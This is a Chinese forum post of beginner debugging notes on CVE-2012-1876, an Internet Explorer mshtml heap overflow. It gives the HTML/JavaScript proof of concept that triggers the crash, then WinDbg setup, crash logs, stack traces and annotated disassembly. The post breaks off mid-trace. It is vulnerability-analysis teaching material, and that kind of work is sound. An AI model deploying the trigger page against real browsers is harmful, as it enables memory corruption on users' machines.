首页
社区
课程
招聘
[原创]漏洞战争:CVE-2012-1876调试笔记
2018-3-18 03:22 11984

[原创]漏洞战争:CVE-2012-1876调试笔记

2018-3-18 03:22
11984

前言

在调试漏洞战争上的CVE-2012-1876做了一些笔记,漏洞分析的话漏洞战争和vupen的文章已经写的很清楚了。
因为是第一次用windbg,所以我主要把自己的环境搭建(比如怎么导入符号文件)和调试日志(十分详细)记录了一下,希望对那些和我一样,刚开始学习漏洞分析与调试的人有所帮助。

参考资料

调试环境搭建

下载

windbg符号文件设置

在windbg的窗口里输入

.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

重启后要重新输入。

poc调试

<html>
 <body>
 <table style="table-layout:fixed" >
        <col id="132" width="41" span="1" >&nbsp </col>
 </table>
 <script>

 function over_trigger() {
        var obj_col = document.getElementById("132");
        obj_col.width = "42765";
        obj_col.span = 1000;
 }

 setTimeout("over_trigger();",1);

 </script>
 </body>
 </html>

基于HPA的漏洞分析方法

  • hpa:启动页堆,在堆块后增加专门用于检测溢出的栅栏页,若发生堆溢出触及栅栏页便会立刻触发异常。

在终端通过gflags启动hpa

启动ie浏览器后,用windbg attach进程


两个进程,一个是broker进程 一个是页面的内容进程,附加后面的那个就可以,就是内容进程。
检查一下hpa开了没。

0:000> .symfix
0:000> .reload
Reloading current modules
................................................................
.............................
0:000> !gflag
Current NtGlobalFlag contents: 0x02000000
    hpa - Place heap allocations at ends of pages

然后需要开启子进程调试,这样才能断下来。

.childdbg 1

然后g,启动调试器。

0:027> g
ModLoad: 74c30000 74c38000   C:\Windows\system32\credssp.dll
ModLoad: 752a0000 752a8000   C:\Windows\system32\secur32.dll
ModLoad: 750c0000 750f8000   C:\Windows\system32\ncrypt.dll
ModLoad: 750a0000 750b7000   C:\Windows\system32\bcrypt.dll
ModLoad: 74c70000 74cad000   C:\Windows\system32\bcryptprimitives.dll
ModLoad: 74b50000 74b66000   C:\Windows\system32\GPAPI.dll
ModLoad: 70c60000 70c7c000   C:\Windows\system32\cryptnet.dll
ModLoad: 72e70000 72e85000   C:\Windows\system32\Cabinet.dll
ModLoad: 74d10000 74d1e000   C:\Windows\system32\DEVRTL.dll


看到debugger正在运行了。
然后把poc拖到浏览器里运行。
另外poc拖进去之后,会自动断下来。

再g一下,就变成下面这个样子。

1:021> g
ModLoad: 760f0000 7610f000   C:\Windows\system32\IMM32.DLL
ModLoad: 75b40000 75c0c000   C:\Windows\system32\MSCTF.dll
ModLoad: 6ccf0000 6d76c000   C:\Windows\system32\IEFRAME.dll
ModLoad: 75da0000 75da5000   C:\Windows\system32\PSAPI.DLL
ModLoad: 72940000 7297c000   C:\Windows\system32\OLEACC.dll
ModLoad: 741a0000 7433e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\comctl32.dll
ModLoad: 75810000 7588b000   C:\Windows\system32\comdlg32.dll
ModLoad: 71620000 71655000   C:\Program Files\Internet Explorer\IEShims.dll
ModLoad: 75460000 7546c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 74390000 743d0000   C:\Windows\system32\uxtheme.dll
ModLoad: 75500000 7550e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 735b0000 735c3000   C:\Windows\system32\dwmapi.dll
ModLoad: 723c0000 723f3000   C:\Program Files\Internet Explorer\sqmapi.dll
ModLoad: 74f90000 74fa6000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 76170000 7630d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 756b0000 756d7000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 756e0000 756f2000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74d30000 74d6b000   C:\Windows\system32\rsaenh.dll
ModLoad: 764a0000 76523000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 743f0000 744e5000   C:\Windows\system32\propsys.dll
ModLoad: 6f9e0000 6fa0b000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 772c0000 773b4000   C:\Windows\system32\WININET.dll
ModLoad: 76490000 76493000   C:\Windows\system32\Normaliz.dll
ModLoad: 75510000 7551b000   C:\Windows\system32\profapi.dll
ModLoad: 753f0000 7540a000   C:\Windows\system32\SspiCli.dll
ModLoad: 75db0000 75de5000   C:\Windows\system32\ws2_32.DLL
ModLoad: 759f0000 759f6000   C:\Windows\system32\NSI.dll
ModLoad: 74e10000 74e54000   C:\Windows\system32\dnsapi.DLL
ModLoad: 739a0000 739bc000   C:\Windows\system32\iphlpapi.DLL
ModLoad: 73980000 73987000   C:\Windows\system32\WINNSI.DLL
ModLoad: 6d920000 6d94e000   C:\Windows\system32\MLANG.dll
ModLoad: 75410000 7545b000   C:\Windows\system32\apphelp.dll
ModLoad: 73fe0000 74001000   C:\Windows\system32\ntmarta.dll
ModLoad: 77500000 77545000   C:\Windows\system32\WLDAP32.dll
ModLoad: 74a10000 74a19000   C:\Windows\system32\VERSION.dll
ModLoad: 67b10000 680c2000   C:\Windows\System32\mshtml.dll
ModLoad: 6e2c0000 6e2ea000   C:\Windows\System32\msls31.dll
ModLoad: 75470000 754cf000   C:\Windows\system32\SXS.DLL
ModLoad: 71270000 712a2000   C:\Windows\system32\WINMM.dll
ModLoad: 744f0000 74529000   C:\Windows\system32\MMDevAPI.DLL
ModLoad: 6daf0000 6db20000   C:\Windows\system32\wdmaud.drv
ModLoad: 6dae0000 6dae4000   C:\Windows\system32\ksuser.dll
ModLoad: 74730000 74737000   C:\Windows\system32\AVRT.dll
ModLoad: 6db20000 6db56000   C:\Windows\system32\AUDIOSES.DLL
ModLoad: 74760000 7476b000   C:\Windows\system32\msimtf.dll
ModLoad: 6dad0000 6dad8000   C:\Windows\system32\msacm32.drv
ModLoad: 6dab0000 6dac4000   C:\Windows\system32\MSACM32.dll
ModLoad: 6daa0000 6daa7000   C:\Windows\system32\midimap.dll


然后允许ActiveX控件运行。

(4b8.c00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=06caf000 edi=06caf018
eip=67f3f167 esp=0452daa8 ebp=0452dab4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CTableColCalc::AdjustForCol+0x15:
67f3f167 890f            mov     dword ptr [edi],ecx  ds:0023:06caf018=????????

然后kb回溯一下栈

1:025> kb
ChildEBP RetAddr  Args to Child              
0452dab4 67db5b8e 00414114 0452ddf8 00000001 mshtml!CTableColCalc::AdjustForCol+0x15
0452db64 67c20713 00000001 0452ddf8 000003e8 mshtml!CTableLayout::CalculateMinMax+0x52f
0452dd80 67c0af19 0452ddf8 0452ddc4 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0452df2c 67cfcc48 0452f5a0 0452e158 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0452e064 67cef5d0 06e19ea8 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
0452e128 67cef31d 06e19ea8 0001769c 0001769c mshtml!CFlowLayout::MeasureSite+0x312
0452e170 67cef664 0779bf00 00000061 0452f5a0 mshtml!CFlowLayout::GetSiteWidth+0x156
0452e1b0 67cefb40 07bfafb0 06e19ea8 00000001 mshtml!CLSMeasurer::GetSiteWidth+0xce
0452e234 6e2c665d 07862ff8 0452e254 0452e318 mshtml!CEmbeddedILSObj::Fmt+0x150
0452e2c4 6e2c6399 07c12efc 00000000 07025d20 msls31!ProcessOneRun+0x3e9
0452e320 6e2c6252 07c12f18 00018258 00000000 msls31!FetchAppendEscCore+0x18e
0452e374 6e2c61c3 00000000 00000000 00000014 msls31!LsDestroyLine+0x47f
0452e3fc 6e2c293f 00000007 00003832 00000000 msls31!LsDestroyLine+0x9ff
0452e438 67cedd81 00000001 00000007 00003832 msls31!LsCreateLine+0xcb
0452e588 67d017cc 0452f5a0 00000007 07bfafc0 mshtml!CLSMeasurer::LSDoCreateLine+0x127
0452e62c 67d01ef5 0452ee90 0001769c 00000000 mshtml!CLSMeasurer::LSMeasure+0x34
0452e674 67d01db1 00000000 00017e6c 00000083 mshtml!CLSMeasurer::Measure+0x1e6
0452e698 67d011a2 00017e6c 00000083 0779bf40 mshtml!CLSMeasurer::MeasureLine+0x1c
0452e748 67d2a8f6 0452ec68 07470fd8 00000083 mshtml!CRecalcLinePtr::MeasureLine+0x46d
0452ef50 67d2b304 0452f5a0 00000007 0000000e mshtml!CDisplay::RecalcLines+0x8bb
0452f0a0 67d28c5c 0452f5a0 00000007 0000000e mshtml!CDisplay::UpdateView+0x208
0452f154 67d29ee3 0452f5a0 0452f6d8 0873cf10 mshtml!CFlowLayout::CommitChanges+0x9c
0452f264 67c0eb06 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcTextSize+0x30f
0452f4ec 67d002ee 0779bf00 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCoreCompat+0x1045
0452f508 67d00367 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCore+0x49
0452f544 67d0029c 0452f5a0 0452f6d8 00000000 mshtml!CBodyLayout::CalcSizeCore+0xd8
0452f57c 67cfcc48 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeVirtual+0x1af
0452f6b4 67c84121 0779bf00 00000001 00000000 mshtml!CLayout::CalcSize+0x2b8
0452f7a4 67d290f9 00100000 00000007 059ebeb4 mshtml!CFlowLayout::DoLayout+0x543
0452f7e0 67cec8ca 059eb870 00100000 0452f840 mshtml!CView::ExecuteLayoutTasks+0x3b
0452f824 67d2336d 00000000 0452f870 0000008d mshtml!CView::EnsureView+0x355
0452f848 67ce94b2 059eb870 00000000 06d24d58 mshtml!CView::EnsureViewCallback+0xd3
0452f87c 67cd37f7 0452f918 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0452f89c 75ce86ef 000f0402 00000012 00000000 mshtml!GlobalWndProc+0x10c
0452f8c8 75ce8876 67cc1de3 000f0402 00008002 USER32!InternalCallWinProc+0x23
0452f940 75ce89b5 00000000 67cc1de3 000f0402 USER32!UserCallWinProcCheckWow+0x14b
0452f9a0 75ce8e9c 67cc1de3 00000000 0452fa28 USER32!DispatchMessageWorker+0x35e
0452f9b0 6cde04a6 0452f9c8 00000000 00752f58 USER32!DispatchMessageW+0xf
0452fa28 6cdf0446 05688808 00000000 006ccff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452
0452fae0 75f549bd 00752f58 00000000 0452fafc IEFRAME!LCIETab_ThreadProc+0x2c1
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
0452faf0 76361174 006ccff0 0452fb3c 7741b3f5 iertutil!CIsoScope::RegisterThread+0xab
WARNING: Stack unwind information not available. Following frames may be wrong.
0452fafc 7741b3f5 006ccff0 73d26994 00000000 kernel32!BaseThreadInitThunk+0x12
0452fb3c 7741b3c8 75f549af 006ccff0 00000000 ntdll!__RtlUserThreadStart+0x70
0452fb54 00000000 75f549af 006ccff0 00000000 ntdll!_RtlUserThreadStart+0x1b

这里可能会出现没有符号的问题,解决方法如下:
在windbg的窗口里输入

.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

然后可以看见

 

分析一下
首先导致崩溃的(分析内容在下述代码注释了)

1:025> uf mshtml!CTableColCalc::AdjustForCol
mshtml!CTableColCalc::AdjustForCol:
67f3f152 8bff            mov     edi,edi
67f3f154 55              push    ebp
67f3f155 8bec            mov     ebp,esp
67f3f157 8b08            mov     ecx,dword ptr [eax]
67f3f159 53              push    ebx
67f3f15a 8b5d08          mov     ebx,dword ptr [ebp+8]
67f3f15d 57              push    edi
67f3f15e 8bc1            mov     eax,ecx
67f3f160 83e00f          and     eax,0Fh
67f3f163 8d7e18          lea     edi,[esi+18h];可以看到edi来源于esi,但是esi的处理代码并不在这个函数里,所以继续向上回溯。
67f3f166 50              push    eax
67f3f167 890f            mov     dword ptr [edi],ecx;向edi指向的内存里拷贝值导致crash
67f3f169 e89eacdbff      call    mshtml!CUnitValue::IsScalerUnit (67cf9e0c)
67f3f16e 85c0            test    eax,eax
67f3f170 7411            je      mshtml!CTableColCalc::AdjustForCol+0x31 (67f3f183)

...

这样就清楚了,我们要在上一个函数下断。
重启一下windbg,重新attach

0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> lmm mshtml
start    end        module name
0:021> sxe ld:mshtml
0:021> g

这个时候把poc拖进去(注意到没有提示允许activeX运行)

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: srv*
Page heap: pid 0xDC4: page heap enabled with flags 0x3.
(dc4.e34): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0016f5d8 edx=774064f4 esi=fffffffe edi=00000000
eip=7745e60e esp=0016f5f4 ebp=0016f620 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
7745e60e cc              int     3
1:014> g
ModLoad: 691c0000 69772000   C:\Windows\System32\mshtml.dll
eax=07237000 ebx=00000000 ecx=00171000 edx=00000000 esi=7ffda000 edi=0467b384
eip=774064f4 esp=0467b29c ebp=0467b2f0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
774064f4 c3              ret

1:025> lm m mshtml
start    end        module name
691c0000 69772000   mshtml     (deferred)
  • lm (List Loaded Modules)
    lm命令显示指定的已加载模块。输出中包含模块状态和路径。

    • m Pattern
      指定模块名必须匹配的模板。Pattern可以包含各种通配符和修饰符。关于语法的更多信息,查看字符串通配符语法。
  • sx 命令显示当前进程的异常列表和所有非异常的事件列表,并且显示调试器遇到每个异常和事件时的行为。

    • sxe Break
      当发生该异常时,在任何错误处理器被激活之前目标立即中断到调试器中。这种处理类型称为第一次处理机会。
  • ld (Load Symbols)
    ld 命令加载指定模块的符号并刷新所有模块信息。

这样组合起来,就是ld制定mshtml加载,然后sxe强制在加载这个模块后断下。
现在我们就可以对这个函数下断了。

1:025> bp mshtml!CTableLayout::CalculateMinMax
1:025> bl
 0 e 692d018a     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax
1:025> g
(c84.798): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
  • bp, bu, bm (Set Breakpoint)
    bp、bu和bm命令设置一个或多个软断点(software breakpoints)。可以组合位置、条件和选项来设置各种不同类型的软断点。
  • bl (Breakpoint List)
    bl 命令列出已存在的断点的信息。
  • g 命令开始指定进程或线程的执行。这种执行将会在程序结束、遇到BreakAddress 或者其他造成调试器停止的事件发生时停止。

我在调试的时候辅助了一下IDA,其实是可以不用的。
直接静态分析找到CalculateMinMax

另外这里也需要导入符号。


 

单步继续跟随调试,按p就可以单步执行( 不进入函数那种),不过其实按回车也可以。

eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
1:025> 
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018c esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x2:
692d018c 55              push    ebp
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018d esp=0467e4ac ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x3:
692d018d 8bec            mov     ebp,esp
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018f esp=0467e4ac ebp=0467e4ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x5:
692d018f 81ec90000000    sub     esp,90h
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0195 esp=0467e41c ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xb:
692d0195 53              push    ebx
1:025> 
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0196 esp=0467e418 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xc:
692d0196 8b5d08          mov     ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8

注意到mov ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8,[ebp+8]是参数1(知道栈吧..)

1:025> dd poi(ebp+8)
0492aea8->poi(ebp+8)  691c9868 06216f30 071d8fb8 69384918
0492aeb8  00000001 00000000 0108080d ffffffff
0492aec8  00000000 00000000 00000000 ffffffff
0492aed8  0001769c 0000a7f8 00000000 00000000
0492aee8  00000000 00412802 00000000 00000000
0492aef8  00000000 00000001 ffffffff ffffffff
0492af08  ffffffff ffffffff 691c9fd0 00000004
0492af18  00000004 0497eff0 691c9fd0 00000004
  • dd 双字值(4字节)
    默认的显示数量为32个DWORD(128字节)。
  • poi()
    指定地址处的指针大小的数据。指针大小或者是 32 位或者是 64 位。在内核调试模式,大小基于目标计算机上的处理器。在 Intel Itanium 计算机上用户模式调试下,大小或者是 32 位或者是 64 位,依赖于目标应用程序。所以,如果你想得到指针大小的数据最好使用 poi 运算符。
1:025> dd poi(ebp+8)
0492aea8  691c9868 06216f30 071d8fb8 69384918
0492aeb8  00000001 00000000 0108080d ffffffff
0492aec8  00000000 00000000 00000000 ffffffff
0492aed8  0001769c 0000a7f8 00000000 00000000
0492aee8  00000000 00412802 00000000 00000000
0492aef8  00000000 00000001 ffffffff ffffffff
0492af08  ffffffff ffffffff 691c9fd0 00000004
0492af18  00000004 0497eff0 691c9fd0 00000004
1:025> ln 691c9868 
(691c9868)   mshtml!CTableLayout::`vftable'   |  (691c99a8)   mshtml!CTableLayoutBlock::`vftable'
Exact matches:
    mshtml!CTableLayout::`vftable' = <no type information>
  • ln 命令显示给定地址处的或者最近的符号。

可见参数1引用的是CTableLayout对象,也就是<table>标签中的对象。

1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0199 esp=0467e418 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xf:
692d0199 56              push    esi
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d019a esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x10:
692d019a 8b750c          mov     esi,dword ptr [ebp+0Ch] ss:0023:0467e4b8=0467e740
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d019d esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x13:
692d019d 8b4628          mov     eax,dword ptr [esi+28h] ds:0023:0467e768=00000000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a0 esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x16:
692d01a0 898574ffffff    mov     dword ptr [ebp-8Ch],eax ss:0023:0467e420=00171000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a6 esp=0467e414 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1c:
692d01a6 8b4354          mov     eax,dword ptr [ebx+54h] ds:0023:0492aefc=00000001

这里的ebx+54h指向的是table标签里的col元素的span值,在poc中只有一个span值1,所以这里赋值1.

 

讲道理,用windbg这样看汇编太难受了,接下来我们用IDA看吧

.text:74D3018A
.text:74D3018A                 mov     edi, edi
.text:74D3018C                 push    ebp
.text:74D3018D                 mov     ebp, esp
.text:74D3018F                 sub     esp, 90h
.text:74D30195                 push    ebx             ; struct tagSIZE *
.text:74D30196                 mov     ebx, [ebp+arg_0];-> 参数1引用的是CTableLayout对象,也就是table标签在内存的对象。
.text:74D30199                 push    esi             ; struct CTableCalcInfo *
.text:74D3019A                 mov     esi, [ebp+arg_4]
.text:74D3019D                 mov     eax, [esi+28h]
.text:74D301A0                 mov     [ebp+var_8C], eax
.text:74D301A6                 mov     eax, [ebx+54h]; -> span属性值的和,我们将其标记为spansum
.text:74D301A9                 mov     [ebp+arg_0], eax; -> arg_0=spansum
.text:74D301AC                 mov     eax, [ebx+128h]
.text:74D301B2                 shr     eax, 2
...
...
...
.text:74D30293 loc_74D30293:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105j
.text:74D30293                 mov     edx, [ebp+arg_0];-> edx=arg_0=spansum
.text:74D30296                 mov     eax, edx
.text:74D30298                 sub     eax, ecx
.text:74D3029A                 mov     [ebp+var_1C], eax
.text:74D3029D                 push    0
.text:74D3029F                 pop     eax
.text:74D302A0                 setz    al
.text:74D302A3                 mov     [ebx+50h], ecx
.text:74D302A6                 shl     eax, 8
.text:74D302A9                 xor     eax, [ebx+44h]
.text:74D302AC                 and     eax, 100h
.text:74D302B1                 xor     [ebx+44h], eax
.text:74D302B4                 test    byte ptr [esi+2Ch], 1
.text:74D302B8                 jnz     loc_74C5EE4D
.text:74D302BE
.text:74D302BE loc_74D302BE:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133Bj
.text:74D302BE                 xor     eax, eax
.text:74D302C0
.text:74D302C0 loc_74D302C0:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9j
.text:74D302C0                 or      [ebp+var_38], eax
.text:74D302C3                 cmp     [ebp+arg_8], edi
.text:74D302C6                 jnz     loc_74EC5948
.text:74D302CC                 mov     eax, [ebx+94h];->CTableLayout+0x94,用于和spansum作比较,此处标记为spancmp
.text:74D302D2                 shr     eax, 2;-> spancmp>>2即spancmp/4
.text:74D302D5                 cmp     eax, edx;若spancmp >= spansum,则跳转,这里是0<1,所以不跳转。
.text:74D302D7                 jge     short loc_74D30312
.text:74D302D9                 cmp     edx, edi
.text:74D302DB                 lea     esi, [ebx+90h]
.text:74D302E1                 jl      loc_74C2CE82
.text:74D302E7                 cmp     edx, [esi+8]
.text:74D302EA                 jbe     short loc_74D302FF
.text:74D302EC                 push    1Ch             ; unsigned int
.text:74D302EE                 mov     eax, edx
.text:74D302F0                 mov     edi, esi
.text:74D302F2                 call    ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)

跟进CImplAry::EnsureSizeWorker函数,发现该函数主要用于分配堆内存,分配的内存大小,分配的内存大小为spansum * 0x1C,虽然此处spansum为1,但其分配的最小值为0x1C * 4=0x70,分配的地址保存在CtableLayout+0x9C

.text:74DF8F9C ; public: long __thiscall CDataAry<long>::EnsureSize(long)
.text:74DF8F9C ?EnsureSize@?$CDataAry@J@@QAEJJ@Z proc near
.text:74DF8F9C                                         ; CODE XREF: CTimerCtx::CTimerCtx(CTimerMan *,_RTL_CRITICAL_SECTION *)+ACp
.text:74DF8F9C                                         ; CDocument::EnumObjects(ulong,IEnumUnknown * *)+6Bp ...
.text:74DF8F9C
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74DF9013 SIZE 00000009 BYTES
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74EBD728 SIZE 00000007 BYTES
.text:74DF8F9C
.text:74DF8F9C                 mov     edi, edi
.text:74DF8F9E                 push    edi             ; __int32
.text:74DF8F9F                 mov     edi, ecx
.text:74DF8FA1                 test    eax, eax
.text:74DF8FA3                 jl      loc_74EBD728
.text:74DF8FA9                 cmp     eax, [edi+8]
.text:74DF8FAC                 ja      short loc_74DF9013
.text:74DF8FAE                 xor     eax, eax
.text:74DF8FB0                 pop     edi
.text:74DF8FB1                 retn
.text:74DF8FB1 ?EnsureSize@?$CDataAry@J@@QAEJJ@Z endp
.text:74DF8FB1
.text:74DF8FB1 ; ---------------------------------------------------------------------------
.text:74DF8FB2                 db 5 dup(90h)
.text:74DF8FB7
.text:74DF8FB7 ; =============== S U B R O U T I N E =======================================
.text:74DF8FB7
.text:74DF8FB7 ; Attributes: bp-based frame
.text:74DF8FB7
.text:74DF8FB7 ; __int32 __thiscall CImplAry::EnsureSizeWorker(CImplAry *__hidden this, unsigned int, __int32)
.text:74DF8FB7 ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z proc near
.text:74DF8FB7                                         ; CODE XREF: CSelectionRenderingServiceProvider::GetSelectionChunksForLayout(CFlowLayout *,CRenderInfo *,CDataAry<HighlightSegment> *,int *,int *)-6B92p
.text:74DF8FB7                                         ; CView::DeferTransition(COleSite *)+3Fp ...
.text:74DF8FB7
.text:74DF8FB7 dwBytes         = dword ptr -8
.text:74DF8FB7 var_4           = dword ptr -4
.text:74DF8FB7 Size            = dword ptr  8
.text:74DF8FB7
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E02CB4 SIZE 00000036 BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E3BEEC SIZE 0000003D BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74EBD6E7 SIZE 0000000D BYTES
.text:74DF8FB7
.text:74DF8FB7                 mov     edi, edi
.text:74DF8FB9                 push    ebp
.text:74DF8FBA                 mov     ebp, esp
.text:74DF8FBC                 push    ecx
.text:74DF8FBD                 push    ecx
.text:74DF8FBE                 push    ebx
.text:74DF8FBF                 push    esi             
.text:74DF8FC0                 mov     esi, eax
.text:74DF8FC2                 push    4
.text:74DF8FC4                 pop     eax
.text:74DF8FC5                 mov     [ebp+var_4], eax
.text:74DF8FC8                 cmp     esi, eax
.text:74DF8FCA                 jnb     loc_74E02CB4
.text:74DF8FD0
.text:74DF8FD0 loc_74DF8FD0:                           
.text:74DF8FD0                                         ; CImplAry::EnsureSizeWorker(uint,long)+9D25j ...
.text:74DF8FD0                 mov     eax, [ebp+var_4]; -> eax=4
.text:74DF8FD3                 mul     [ebp+Size]; ->分配spansum*0x1C大小的内存,至少是0x1C*4=0x70
.text:74DF8FD6                 push    edx
.text:74DF8FD7                 push    eax;-> size参数         
.text:74DF8FD8                 lea     eax, [ebp+dwBytes]
.text:74DF8FDB                 call    ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
.text:74DF8FE0                 mov     ebx, eax
.text:74DF8FE2                 test    ebx, ebx
.text:74DF8FE4                 jnz     short loc_74DF900B
.text:74DF8FE6                 test    byte ptr [edi+4], 2
.text:74DF8FEA                 jnz     loc_74E3BEEC
.text:74DF8FF0                 push    [ebp+dwBytes] ;->spansum*0x1c=0x1c 
.text:74DF8FF3                 lea     esi, [edi+0Ch]
.text:74DF8FF6                 call    ?_HeapRealloc@@YGJPAPAXI@Z ; ->执行完CimplAry::EnsureSizeWorker函数保存的返回地址在CTableLayout+0x90+0xC,即导致漏洞的堆块,标记为vulheap
.text:74DF8FFB                 mov     ebx, eax
.text:74DF8FFD                 test    ebx, ebx
.text:74DF8FFF                 jnz     short loc_74DF900B
.text:74DF9001

我们看下分配的缓冲区vulheap地址。

1:025> bp mshtml!CTableLayout::CalculateMinMax+0x168
1:025> g
Breakpoint 1 hit
eax=00000001 ebx=0492aea8 ecx=00000000 edx=00000001 esi=0492af38 edi=0492af38
eip=692d02f2 esp=0467e40c ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1d3:
692d02f2 e8c08c0c00      call    mshtml!CImplAry::EnsureSizeWorker (69398fb7)

分配的地址在ebx+0x9C

1:025> p
